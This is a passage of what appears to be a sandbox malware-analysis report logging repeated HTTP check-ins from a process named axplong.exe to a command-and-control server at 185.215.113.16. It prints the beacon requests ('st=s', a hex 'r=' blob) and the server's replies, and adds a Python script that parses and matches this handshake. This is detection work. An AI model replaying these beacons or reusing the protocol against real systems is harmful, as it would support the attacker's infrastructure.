    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID: 29
Source IP: 192.168.2.4
Source Port: 49814
Destination IP: 185.215.113.16
Destination Port: 80
PID: 2304
Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp: Sep 27, 2024 17:42:38.932248116 CEST  Bytes transferred: 156  Direction: OUT
Data:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Timestamp: Sep 27, 2024 17:42:39.675354004 CEST  Bytes transferred: 219  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0

Timestamp: Sep 27, 2024 17:42:39.684696913 CEST  Bytes transferred: 308  Direction: OUT
Data:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09

Timestamp: Sep 27, 2024 17:42:39.907602072 CEST  Bytes transferred: 196  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 30
Source IP: 192.168.2.4
Source Port: 49817
Destination IP: 185.215.113.16
Destination Port: 80
PID: 2304
Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp: Sep 27, 2024 17:42:40.078653097 CEST  Bytes transferred: 156  Direction: OUT
Data:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Timestamp: Sep 27, 2024 17:42:40.803431988 CEST  Bytes transferred: 219  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0

Timestamp: Sep 27, 2024 17:42:40.805481911 CEST  Bytes transferred: 308  Direction: OUT
Data:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09

Timestamp: Sep 27, 2024 17:42:41.035911083 CEST  Bytes transferred: 196  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 31
Source IP: 192.168.2.4
Source Port: 49819
Destination IP: 185.215.113.16
Destination Port: 80
PID: 2304
Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp: Sep 27, 2024 17:42:41.153410912 CEST  Bytes transferred: 156  Direction: OUT
Data:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Timestamp: Sep 27, 2024 17:42:41.931767941 CEST  Bytes transferred: 219  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0

Timestamp: Sep 27, 2024 17:42:41.932569027 CEST  Bytes transferred: 308  Direction: OUT
Data:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09

Timestamp: Sep 27, 2024 17:42:42.164429903 CEST  Bytes transferred: 196  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 32
Source IP: 192.168.2.4
Source Port: 49821
Destination IP: 185.215.113.16
Destination Port: 80
PID: 2304
Process: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp: Sep 27, 2024 17:42:42.306612015 CEST  Bytes transferred: 156  Direction: OUT
Data:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Timestamp: Sep 27, 2024 17:42:43.047832966 CEST  Bytes transferred: 219  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0

Timestamp: Sep 27, 2024 17:42:43.069158077 CEST  Bytes transferred: 308  Direction: OUT
Data:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09

Timestamp: Sep 27, 2024 17:42:43.312967062 CEST  Bytes transferred: 196  Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49823 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:43.517040014 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:44.228558064 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:44.248790979 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:44.483057022 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49824 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:44.644453049 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:45.341553926 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:45.360764980 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:45.584373951 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49826 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:45.709882975 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:46.427062988 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:46.474534988 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:46.704027891 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49827 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:46.824382067 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:47.538531065 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:47.564946890 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:47.804733992 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0
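
Every session above is the same four-message exchange from axplong.exe to 185.215.113.16: a form POST to /Jo89Ku7d/index.php with the body st=s, a 200 response carrying Refresh: 0; url = Login.php and a one-byte chunked body, a second POST with the body r=<hex>, and a 200 response whose chunked body is <c><d>. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it turns the Data Raw hex back into bytes, decodes the chunked response bodies, labels each message, and matches a session against that exact sequence so the pattern can be checked in a captured stream rather than by eye. The sample session it feeds itself is constructed from the values shown above; the r= payload is treated as an opaque hex blob and nothing is assumed about what it encodes.

```python
import re

# Constructed sample: one check-in session as it appears in the blocks above,
# as (direction, raw HTTP head, "Data Raw" hex of the body). The r= value is
# the one the report shows; nothing is assumed about what it encodes.
R_BLOB = ("AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F"
          "81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09")
REQ_LINES = ("POST /Jo89Ku7d/index.php HTTP/1.1",
             "Content-Type: application/x-www-form-urlencoded", "Host: 185.215.113.16")
RESP_LINES = ("HTTP/1.1 200 OK", "Server: nginx/1.18.0 (Ubuntu)",
              "Content-Type: text/html; charset=UTF-8", "Transfer-Encoding: chunked",
              "Connection: keep-alive")

def _head(*lines):
    """Join header lines into a raw HTTP message head (CRLF, blank line at end)."""
    return "\r\n".join(lines) + "\r\n\r\n"

def _hexdump(data):
    """Render bytes the way the report's 'Data Raw' field does ("73 74 3d 73")."""
    return " ".join(f"{b:02x}" for b in data)

SAMPLE_SESSION = [
    ("OUT", _head(*REQ_LINES, "Content-Length: 4", "Cache-Control: no-cache"), "73 74 3d 73"),
    ("IN", _head(*RESP_LINES, "Refresh: 0; url = Login.php"), "31 0d 0a 20 0d 0a 30 0d 0a 0d 0a"),
    ("OUT", _head(*REQ_LINES, "Content-Length: 154", "Cache-Control: no-cache"),
     _hexdump(b"r=" + R_BLOB.encode("ascii"))),
    ("IN", _head(*RESP_LINES), "37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a"),
]

def hexdump_to_bytes(raw):
    """Turn a 'Data Raw' field back into the bytes that were on the wire."""
    return bytes.fromhex(raw.replace(" ", ""))

def dechunk(body):
    """Decode an HTTP/1.1 chunked body (hex size, CRLF, data, CRLF, ..., zero-size
    chunk). Raises ValueError on a truncated body rather than returning part of it."""
    out, pos = bytearray(), 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("missing chunk-size line")
        size = int(body[pos:end].split(b";", 1)[0].strip(), 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2

def parse_http(head):
    """Split a raw message head into its start line and a lower-cased header map."""
    lines = head.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

HEX_FORM = re.compile(r"^r=[0-9A-Fa-f]+$")

def classify(direction, head, raw_body):
    """Label one message: checkin, ack-refresh, report, ack-cd or other."""
    start, headers = parse_http(head)
    body = hexdump_to_bytes(raw_body)
    if direction == "OUT":
        # Beacon requests are form POSTs whose declared length matches the body.
        if (not start.startswith("POST ")
                or headers.get("content-type") != "application/x-www-form-urlencoded"
                or headers.get("content-length") != str(len(body))):
            return "other"
        text = body.decode("ascii", errors="replace")
        if text == "st=s":
            return "checkin"
        return "report" if HEX_FORM.match(text) else "other"
    if headers.get("transfer-encoding", "").lower() == "chunked":
        try:
            body = dechunk(body)
        except ValueError:
            return "other"
    if "login.php" in headers.get("refresh", "").lower():
        return "ack-refresh"
    return "ack-cd" if body.strip() == b"<c><d>" else "other"

HANDSHAKE = ["checkin", "ack-refresh", "report", "ack-cd"]

def match_handshake(session):
    """Return (labels, matched); matched is True only for the exact
    st=s -> Refresh -> r=<hex> -> <c><d> exchange seen in the sessions above."""
    labels = [classify(d, h, b) for d, h, b in session]
    return labels, labels == HANDSHAKE

if __name__ == "__main__":
    print(match_handshake(SAMPLE_SESSION))
```

Two choices are deliberate. An outbound message whose Content-Length disagrees with the body it carries is labelled other rather than guessed at, so a stream that a proxy or the sandbox has re-framed does not silently match. The dechunker raises on a truncated chunk instead of returning the partial payload, which matters when the capture ends mid-response, as the last session on this page does.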


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49829 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:47.969048023 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:48.715414047 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:48.721458912 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:48.956645966 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49831 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:49.309902906 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:49.871306896 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:49.892885923 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:50.160288095 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49834 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:50.296418905 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
